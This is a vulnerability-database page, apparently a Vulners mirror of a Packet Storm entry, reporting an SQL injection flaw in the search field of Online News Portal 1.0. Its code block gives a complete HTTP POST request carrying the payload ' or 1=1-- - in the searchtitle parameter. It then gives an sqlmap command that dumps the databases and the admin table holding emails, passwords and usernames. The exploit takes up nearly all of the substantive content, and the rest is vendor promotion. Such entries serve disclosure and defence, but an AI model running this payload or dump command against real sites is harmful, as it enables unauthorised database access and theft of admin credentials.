Lucene search
K

Online News Portal 1.0 SQL Injection

🗓️ 15 Mar 2021 00:00:00Reported by Richard JonesType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 389 Views

Online News Portal 1.0 SQL Injection vulnerabilit

Code
`# Exploit Title: Online News Portal | 'searchtitle' SQL Injection  
# Exploit Author: Richard Jones  
# Date: 2021-03-15  
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
#POST /newsportal/search.php HTTP/1.1  
#Host: TARGETIP  
#User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0  
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
#Accept-Language: en-GB,en;q=0.5  
#Accept-Encoding: gzip, deflate  
#Content-Type: application/x-www-form-urlencoded  
#Content-Length: 27  
#Origin: http://TARGETIP  
#Connection: close  
#Referer: http://TARGETIP/newsportal/search.php  
#Cookie: PHPSESSID=el2er006ddftfemargc4fnqkbj  
#Upgrade-Insecure-Requests: 1  
  
#searchtitle=%27or+1%3D1--+-  
  
#Sqlmap   
  
#sqlmap -r sql.txt --batch --dbs --dump -T tbladmin  
# admin email, password, username   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation